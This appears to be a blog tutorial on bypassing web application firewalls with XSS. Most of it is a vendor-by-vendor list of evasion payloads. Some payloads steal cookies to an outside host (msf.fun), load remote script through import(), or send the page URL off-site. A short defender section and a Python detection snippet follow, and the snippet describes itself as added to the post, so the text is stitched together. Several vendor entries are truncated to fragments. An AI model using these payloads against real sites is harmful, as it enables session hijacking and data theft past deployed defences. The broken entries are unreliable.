
Bypassing Firewalls (WAF) with XSS Payloads

Hey Folks 🙂 !! In this tutorial, we will describe some of the techniques commonly used by hackers to bypass Web Application Firewalls (WAF) during XSS exploitation.

Let’s See 🙂 !!

Introduction

Web Application Firewalls (WAFs) are essential security components designed to protect web applications from various types of attacks, including Cross-Site Scripting (XSS). However, sophisticated attackers often find ways to bypass WAFs, especially when it comes to injecting malicious XSS payloads. In this article, we’ll explore some techniques used to bypass WAFs and execute XSS payloads successfully.

Understanding XSS and WAFs

Cross-Site Scripting (XSS) is a type of injection attack where an attacker injects malicious scripts into content that is then served to users. These scripts can steal user data, hijack sessions, or perform unauthorized actions on behalf of the user.

WAFs are designed to filter and monitor HTTP requests, blocking any malicious attempts based on predefined rules or learning algorithms. However, WAFs are not foolproof, and attackers constantly develop new methods to evade them.

Common WAF Bypass Techniques

  • Obfuscation: Attackers often obfuscate their XSS payloads to bypass WAF detection. Techniques like encoding the payload in different formats (e.g., HTML entities, Base64) or breaking up the script with comments or unnecessary characters can trick the WAF into allowing the payload through.
<img src=x onerror="/*<![CDATA[*/alert(1)/*]]>*/">
  • Using Alternate Event Handlers: WAFs may specifically filter common event handlers like onload or onerror. Attackers can use less common event handlers that may not be included in the WAF’s rule set.
<div style="width:expression(alert(1))"></div>
  • Polyglot Payloads: A polyglot XSS payload is one that can be interpreted in multiple contexts, increasing its chances of bypassing a WAF. These payloads are designed to execute regardless of whether they are processed as HTML, JavaScript, or another scripting language.
<script>/*</script><svg onload=alert(1)>*/
  • Payload Splitting: Splitting the payload into multiple parts can sometimes evade detection, as WAFs may not correctly reassemble the script in its entirety.
<img src='1' onerror='ja'+'vascript:alert(1)'>
  • Manipulating Headers: Some WAFs inspect specific HTTP headers for malicious content. By manipulating or injecting headers in a non-standard way, an attacker might bypass the WAF’s inspection process.
GET / HTTP/1.1
Host: victim.com
Content-Length: 0
X-Forwarded-For: '><script>alert(1)</script>

Now let’s have a look at some WAF bypass payloads 🙂 !!

Akamai XSS Payloads

<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;>
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
<svg><circle><set onbegin=prompt(1) attributename=fill>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
"%3balert`1`%3b"
asd"`> onpointerenter=x=prompt,x`XSS`
<x onauxclick=import('//1152848220/')>click
<x onauxclick=a=alert,a(domain)>click -@niksthehacker
<x onauxclick=import('//1152848220/')>click
<x onauxclick=import('//xss/')>click
\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss
{{constructor.constructor(alert`1`)()}}
javascript:new%20Function`al\ert\`1\``;
https://twitter.com/xhzeem/status/1378316651431612422

<script>Object.prototype.BOOMR = 1;Object.prototype.url='https://portswigger-labs.net/xss/xss.js'</script> -https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click -@stealthybugs

Cloudflare XSS payloads

<a"/>

Cloudfront XSS payloads

">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;

Imperva XSS payloads

<x/>

Incapsula XSS payloads

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
<audio autoplay onloadstart=this.src='hxxps://msf.fun/?c='+document["cook"+"ie"]' src=x>
<img/src=q onerror='new Function`al\ert\`1\``'>
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
<svg onload\r\n=$.globalEval("al"+"ert()");>
[1].map(alert)   or    (alert)(1)
<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-tarun/&rpar;">XXXXX</a>
[1].find(confirm)
<svg/onload=self[`aler`%2b`t`]`1`>
%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E
'-[document.domain].map(alert)-'

WordFence XSS payloads

ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -@naglinagli
<meter onmouseover="alert(1)" -@manjith27945363
'">><div><meter onmouseover="alert(1)"</div>" -@manjith27945363
>><marquee loop=1 width=0 onfinish=alert(1)> -@manjith27945363
Wordfence 7.4.2
<a href=&#01javascript:alert(1)> -@brutelogic
<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20click%20here</a>

Best Practices for Defenders

While understanding how attackers bypass WAFs is crucial, it’s equally important for defenders to continuously update WAF rules, employ multiple layers of security, and conduct regular security assessments.

  1. Regular Updates: Keep WAF signatures and rules up-to-date to cover new and emerging threats.
  2. Defense-in-Depth: Utilize a combination of security mechanisms (e.g., input validation, Content Security Policy) alongside the WAF for better protection.
  3. Security Testing: Regularly perform penetration testing and security assessments to identify and patch any vulnerabilities that could be exploited.
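The payload lists above rely heavily on encoding layers (double URL-encoding, HTML numeric entities, mixed-case tag and handler names) that a WAF matching on the raw request never sees. The following is an added illustration written for this article, not code from the post or from any WAF vendor: it canonicalizes input the way a browser eventually will before applying a small, deliberately incomplete set of illustrative patterns, and shows output encoding as the mitigation that works even when detection misses. The sample strings are constructed from the page's own payload shapes; the pattern list is an assumption for demonstration, not a production ruleset.

```python
import html
import re
from urllib.parse import unquote

# Constructed samples modelled on the encoding tricks shown on this page:
# double URL-encoding, an HTML numeric entity without semicolon, mixed case.
SAMPLES = {
    "double_url": "%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253e",
    "entity_href": "<a href=&#01javascript:alert(1)>",
    "mixed_case": "<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>",
    "benign": "Hello <b>world</b> &amp; friends",
}


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Repeatedly URL-decode and HTML-entity-decode until the string stops
    changing, so a filter inspects the same form the browser will render.
    max_rounds bounds the work an attacker can force with deep nesting."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value


# Illustrative, case-insensitive patterns applied to the canonical form only.
# This is an assumption for demonstration, not a complete WAF ruleset.
_SUSPECT = re.compile(
    r"<\s*script|on[a-z]+\s*=|javascript\s*:|<\s*(svg|img|details|iframe|object)\b",
    re.IGNORECASE,
)


def looks_like_xss(raw: str) -> bool:
    """Detection step: match patterns against the decoded, not the raw, input."""
    return bool(_SUSPECT.search(canonicalize(raw)))


def render_html_text(value: str) -> str:
    """Mitigation step: context-aware output encoding for an HTML text node.
    An injected payload is displayed as text instead of being executed,
    which holds regardless of whether the WAF recognised it."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:12} flagged={looks_like_xss(sample)} canonical={canonicalize(sample)!r}")
    print(render_html_text("<img src=x onerror=alert(1)>"))
```

Note that the double-encoded WordFence-style sample only matches after the second decoding round, which is exactly the gap a single-pass filter leaves.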

Conclusion

Bypassing a WAF with XSS payloads requires creativity and a deep understanding of both the WAF’s limitations and the web application itself. While WAFs provide a strong line of defense, they should not be solely relied upon. A layered security approach combined with continuous monitoring and testing is essential to defend against these sophisticated attacks.

Additionally 🙂 !! If you are a beginner and have difficulty understanding XSS vulnerabilities in depth, you can visit here.

About the Author
Shubham Goyal: Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be contacted on LinkedIn.